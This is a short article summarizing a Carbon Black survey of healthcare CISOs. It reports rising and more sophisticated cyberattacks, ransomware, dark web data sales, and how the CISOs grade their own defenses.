A new survey of healthcare CISOs concluded that the bulk of their organizations saw an increase in cyberattacks over the past year, many of which have grown more cunning over time. For those who were derailed by the WannaCry and NotPetya ransomware attacks of 2017, the news won’t come as a surprise.
According to a report by data security company Carbon Black, 83% of survey respondents reported that such attacks have increased, and moreover, 66% said they had become more sophisticated over the past year.
The security firm said that in 2018, its healthcare customers had an average of 8.2 attempted cyberattacks per endpoint each month. This includes attacks hitting often overlooked points such as printers, biomedical devices and imaging suites.
Almost half (45%) of respondents said they had counterattacks motivated primarily by the destruction of data, Many others were financially-driven by the money to be made on underground data sales. Carbon Black found that the hottest dark web market listings for healthcare-related information included provider data, forgeries and hacked health insurance company login information.
Two-thirds of healthcare organizations reported that they were targeted by ransomware attacks during the same period. (Separate research by McAfee suggests that SamSam ransomware attacks were particularly popular last year.) Malicious Office documents, particularly Excel documents with macro-enabled Power Shell delivery cradles, were the most common fileless attack targeting the vendor’s healthcare customers.
One-third of CISOs said they encountered counter incident response during the past year, and the same amount said they found instances of island hopping in their enterprises over the same period.
To fend off as many of these attacks as possible, 84% of surveyed healthcare organizations train employees on cybersecurity best practices a minimum of one time per year, and 45% said they provide training multiple times per year from in place.
Still, the healthcare CISOs didn’t seem particularly pleased with their cybersecurity defenses. When asked to grade their security posture, 33% of CISOs gave themselves a C grade., 25% a B and 16% a B-. If I were a CEO reading the stats, I’m betting these grades wouldn’t please me too much.
Of course, not everyone is quite this pessimistic about the cyber defenses. An unrelated survey by security vendor Infoblox released earlier this year found that 92% of surveyed health IT professionals were confident that their organization was prepared respond to cyber-attack, up from 82% last year.
As with most things in life I suspect the truth lies somewhere between these two assessments. By no means are hospitals unprepared to protect their data assets, but clearly the adversaries profiting off these breaches are very determined and clever. All told, it’s not altogether a reassuring picture.